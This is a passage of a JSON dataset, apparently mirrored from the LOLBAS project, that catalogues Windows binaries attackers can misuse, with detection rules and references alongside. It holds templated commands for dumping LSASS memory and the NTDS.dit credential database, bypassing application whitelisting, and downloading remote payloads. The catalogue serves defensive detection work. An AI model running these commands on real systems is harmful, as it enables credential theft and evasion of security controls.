reference","availability":"Check installation","aliases":[]},{"id":"lolbas:devtoolslauncher-exe:1","toolId":"lolbas:devtoolslauncher-exe","toolName":"Devtoolslauncher.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"devtoolslauncher.exe LaunchForDebug {PATH_ABSOLUTE:.exe} \"{CMD:args}\" test","description":"The above binary will execute other binary.","usecase":"Execute any binary with given arguments.","mitre":["T1127"],"privilege":"user","fullPath":["c:\\windows\\system32\\devtoolslauncher.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml"},{"type":"IOC","value":"DeveloperToolsSvc.exe spawned an unknown process"}],"references":["https://twitter.com/_felamos/status/1179811992841797632","https://www.virustotal.com/gui/file/84877a507af8b70c145777a87eaf28a8327c50a1563fe650f34572bef8a42ff6/details","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:dnx-exe:0","toolId":"lolbas:dnx-exe","toolName":"dnx.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dnx.exe {PATH_ABSOLUTE:folder}","description":"Execute C# code located in the specified folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies)","usecase":"Local execution of C# project stored in consoleapp folder.","mitre":["T1127"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dnx.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dnx/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:dotnet-exe:0","toolId":"lolbas:dotnet-exe","toolName":"Dotnet.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"dotnet.exe {PATH:.dll}","description":"dotnet.exe will execute any DLL even if applocker is enabled.","usecase":"Execute code bypassing AWL","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\dotnet\\dotnet.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"dotnet.exe spawned an unknown process"}],"references":["https://twitter.com/_felamos/status/1204705548668555264","https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc","https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/","https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:dotnet-exe:1","toolId":"lolbas:dotnet-exe","toolName":"Dotnet.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dotnet.exe {PATH:.dll}","description":"dotnet.exe will execute any DLL.","usecase":"Execute DLL","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\dotnet\\dotnet.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"dotnet.exe spawned an unknown process"}],"references":["https://twitter.com/_felamos/status/1204705548668555264","https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc","https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/","https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:dotnet-exe:2","toolId":"lolbas:dotnet-exe","toolName":"Dotnet.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dotnet.exe fsi","description":"dotnet.exe will open a console which allows for the execution of arbitrary F# commands","usecase":"Execute arbitrary F# code","mitre":["T1059"],"privilege":"user","fullPath":["C:\\Program Files\\dotnet\\dotnet.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"dotnet.exe spawned an unknown process"}],"references":["https://twitter.com/_felamos/status/1204705548668555264","https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc","https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/","https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:dotnet-exe:3","toolId":"lolbas:dotnet-exe","toolName":"Dotnet.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"dotnet.exe msbuild {PATH:.csproj}","description":"dotnet.exe with msbuild (SDK Version) will execute unsigned code","usecase":"Execute code bypassing AWL","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\dotnet\\dotnet.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"dotnet.exe spawned an unknown process"}],"references":["https://twitter.com/_felamos/status/1204705548668555264","https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc","https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/","https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:dsdbutil-exe:0","toolId":"lolbas:dsdbutil-exe","toolName":"dsdbutil.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"dsdbutil.exe \"activate instance ntds\" \"snapshot\" \"create\" \"quit\" \"quit\"","description":"dsdbutil supports VSS snapshot creation","usecase":"Snapshoting of Active Directory NTDS.dit database","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\dsdbutil.exe","C:\\Windows\\SysWOW64\\dsdbutil.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Event ID 4688"},{"type":"IOC","value":"dsdbutil.exe process creation"},{"type":"IOC","value":"Event ID 4663"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"},{"type":"IOC","value":"Event ID 4656"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"}],"references":["https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358","https://www.netwrix.com/ntds_dit_security_active_directory.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dsdbutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["dsDbUtil.exe"]},{"id":"lolbas:dsdbutil-exe:1","toolId":"lolbas:dsdbutil-exe","toolName":"dsdbutil.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"dsdbutil.exe \"activate instance ntds\" \"snapshot\" \"mount {GUID}\" \"quit\" \"quit\"","description":"Mounting the snapshot with its GUID","usecase":"Mounting the snapshot to access the ntds.dit with `copy c:\\<Snap Volume>\\windows\\ntds\\ntds.dit c:\\users\\administrator\\desktop\\ntds.dit.bak`","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\dsdbutil.exe","C:\\Windows\\SysWOW64\\dsdbutil.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Event ID 4688"},{"type":"IOC","value":"dsdbutil.exe process creation"},{"type":"IOC","value":"Event ID 4663"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"},{"type":"IOC","value":"Event ID 4656"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"}],"references":["https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358","https://www.netwrix.com/ntds_dit_security_active_directory.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dsdbutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["dsDbUtil.exe"]},{"id":"lolbas:dsdbutil-exe:2","toolId":"lolbas:dsdbutil-exe","toolName":"dsdbutil.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"dsdbutil.exe \"activate instance ntds\" \"snapshot\" \"delete {GUID}\" \"quit\" \"quit\"","description":"Deletes the mount of the snapshot","usecase":"Deletes the snapshot","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\dsdbutil.exe","C:\\Windows\\SysWOW64\\dsdbutil.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Event ID 4688"},{"type":"IOC","value":"dsdbutil.exe process creation"},{"type":"IOC","value":"Event ID 4663"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"},{"type":"IOC","value":"Event ID 4656"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"}],"references":["https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358","https://www.netwrix.com/ntds_dit_security_active_directory.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dsdbutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["dsDbUtil.exe"]},{"id":"lolbas:dsdbutil-exe:3","toolId":"lolbas:dsdbutil-exe","toolName":"dsdbutil.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"dsdbutil.exe \"activate instance ntds\" \"snapshot\" \"create\" \"list all\" \"mount 1\" \"quit\" \"quit\"","description":"Mounting with snapshot identifier","usecase":"Mounting the snapshot identifier 1 and accessing it with `copy c:\\<Snap Volume>\\windows\\ntds\\ntds.dit c:\\users\\administrator\\desktop\\ntds.dit.bak`","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\dsdbutil.exe","C:\\Windows\\SysWOW64\\dsdbutil.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Event ID 4688"},{"type":"IOC","value":"dsdbutil.exe process creation"},{"type":"IOC","value":"Event ID 4663"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"},{"type":"IOC","value":"Event ID 4656"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"}],"references":["https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358","https://www.netwrix.com/ntds_dit_security_active_directory.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dsdbutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["dsDbUtil.exe"]},{"id":"lolbas:dsdbutil-exe:4","toolId":"lolbas:dsdbutil-exe","toolName":"dsdbutil.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"dsdbutil.exe \"activate instance ntds\" \"snapshot\" \"list all\" \"delete 1\" \"quit\" \"quit\"","description":"Deletes the mount of the snapshot","usecase":"deletes the snapshot","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\dsdbutil.exe","C:\\Windows\\SysWOW64\\dsdbutil.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Event ID 4688"},{"type":"IOC","value":"dsdbutil.exe process creation"},{"type":"IOC","value":"Event ID 4663"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"},{"type":"IOC","value":"Event ID 4656"},{"type":"IOC","value":"Regular and Volume Shadow Copy attempts to read or modify ntds.dit"}],"references":["https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358","https://www.netwrix.com/ntds_dit_security_active_directory.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dsdbutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["dsDbUtil.exe"]},{"id":"lolbas:dtutil-exe:0","toolId":"lolbas:dtutil-exe","toolName":"dtutil.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"dtutil.exe /FILE {PATH_ABSOLUTE:.source.ext} /COPY FILE;{PATH_ABSOLUTE:.dest.ext}","description":"Copy file from source to destination","usecase":"Use to copies the source file to the destination file","mitre":["T1105"],"privilege":"admin","fullPath":["C:\\Program Files\\Microsoft SQL Server\\<version>\\DTS\\Binn\\dtutil.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\<version>\\DTS\\Binn\\dtutil.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/sql/integration-services/dtutil-utility?view=sql-server-ver16","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dtutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:dump64-exe:0","toolId":"lolbas:dump64-exe","toolName":"Dump64.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"dump64.exe {PID} out.dmp","description":"Creates a memory dump of the LSASS process.","usecase":"Create memory dump and parse it offline to retrieve credentials.","mitre":["T1003.001"],"privilege":"admin","fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\Installer\\Feedback\\dump64.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml"},{"type":"IOC","value":"As a Windows SDK binary, execution on a system may be suspicious"}],"references":["https://twitter.com/mrd0x/status/1460597833917251595","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dump64/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:dumpminitool-exe:0","toolId":"lolbas:dumpminitool-exe","toolName":"DumpMinitool.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"DumpMinitool.exe --file {PATH_ABSOLUTE} --processId 1132 --dumpType Full","description":"Creates a memory dump of the lsass process","usecase":"Create memory dump and parse it offline","mitre":["T1003.001"],"privilege":"admin","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\Extensions\\TestPlatform\\Extensions\\DumpMinitool.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml"}],"references":["https://twitter.com/mrd0x/status/1511415432888131586","https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:dxcap-exe:0","toolId":"lolbas:dxcap-exe","toolName":"Dxcap.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Dxcap.exe -c {PATH_ABSOLUTE:.exe}","description":"Launch specified executable as a subprocess of dxcap.exe. Note that you should have write permissions in the current working directory for the command to succeed; alternatively, add '-file c:\\path\\to\\writable\\location.ext' as first argument.","usecase":"Local execution of a process as a subprocess of dxcap.exe","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\System32\\dxcap.exe","C:\\Windows\\SysWOW64\\dxcap.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml"},{"type":"IOC","value":"dxcap.exe executing from outside of System32/SysWOW64"},{"type":"IOC","value":"dxcap.exe spawning Xperf.exe"},{"type":"IOC","value":"Xperf.exe executing from unusual directories (if not running from ADK path)"}],"references":["https://twitter.com/harr0ey/status/992008180904419328","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:dxcap-exe:1","toolId":"lolbas:dxcap-exe","toolName":"Dxcap.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dxcap.exe -usage","description":"Once executed, `dxcap.exe` will execute `xperf.exe` in the same folder. Thus, if `dxcap.exe` is copied to a folder and an arbitrary executable is renamed to `xperf.exe`, `dxcap.exe` will spawn it.","usecase":"Execute an arbitrary executable via trusted system executable.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\System32\\dxcap.exe","C:\\Windows\\SysWOW64\\dxcap.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml"},{"type":"IOC","value":"dxcap.exe executing from outside of System32/SysWOW64"},{"type":"IOC","value":"dxcap.exe spawning Xperf.exe"},{"type":"IOC","value":"Xperf.exe executing from unusual directories (if not running from ADK path)"}],"references":["https://twitter.com/harr0ey/status/992008180904419328","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ecmangen-exe:0","toolId":"lolbas:ecmangen-exe","toolName":"ECMangen.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"ECMangen.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\<version>\\Bin\\ECMangen.exe","C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\<version>\\Bin\\x64\\ECMangen.exe","C:\\Program Files\\Microsoft\\Exchange Server\\<version>\\Bin\\ECMangen.exe","C:\\Program Files\\Microsoft\\Exchange Server\\Bin\\ECMangen.exe","C:\\Program Files\\Microsoft\\Exchange Server\\ClientAccess\\Bin\\ECMangen.exe","C:\\ExchangeServer\\Bin\\ECMangen.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"URL on a ECMangen command line"},{"type":"IOC","value":"ECMangen making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/ECMangen/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:excel-exe:0","toolId":"lolbas:excel-exe","toolName":"Excel.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Excel.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Excel.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office16\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Excel.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office15\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Excel.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office14\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office12\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office12\\Excel.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml"},{"type":"IOC","value":"Suspicious Office application Internet/network traffic"}],"references":["https://twitter.com/reegun21/status/1150032506504151040","https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:fsi-exe:0","toolId":"lolbas:fsi-exe","toolName":"Fsi.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"fsi.exe {PATH:.fsscript}","description":"Execute F# code via script file","usecase":"Execute payload with Microsoft signed binary to bypass WDAC policies","mitre":["T1059"],"privilege":"user","fullPath":["C:\\Program Files\\dotnet\\sdk\\<version>\\FSharp\\fsi.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsi.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Fsi.exe execution may be suspicious on non-developer machines"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml"}],"references":["https://twitter.com/NickTyrer/status/904273264385589248","https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:fsi-exe:1","toolId":"lolbas:fsi-exe","toolName":"Fsi.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"fsi.exe","description":"Execute F# code via interactive command line","usecase":"Execute payload with Microsoft signed binary to bypass WDAC policies","mitre":["T1059"],"privilege":"user","fullPath":["C:\\Program Files\\dotnet\\sdk\\<version>\\FSharp\\fsi.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsi.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Fsi.exe execution may be suspicious on non-developer machines"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml"}],"references":["https://twitter.com/NickTyrer/status/904273264385589248","https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:fsianycpu-exe:0","toolId":"lolbas:fsianycpu-exe","toolName":"FsiAnyCpu.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"fsianycpu.exe {PATH:.fsscript}","description":"Execute F# code via script file","usecase":"Execute payload with Microsoft signed binary to bypass WDAC policies","mitre":["T1059"],"privilege":"user","fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsianycpu.exe"],"toolType":"OtherMSBinary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"FsiAnyCpu.exe execution may be suspicious on non-developer machines"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml"}],"references":["https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:fsianycpu-exe:1","toolId":"lolbas:fsianycpu-exe","toolName":"FsiAnyCpu.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"fsianycpu.exe","description":"Execute F# code via interactive command line","usecase":"Execute payload with Microsoft signed binary to bypass WDAC policies","mitre":["T1059"],"privilege":"user","fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsianycpu.exe"],"toolType":"OtherMSBinary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"FsiAnyCpu.exe execution may be suspicious on non-developer machines"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml"}],"references":["https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 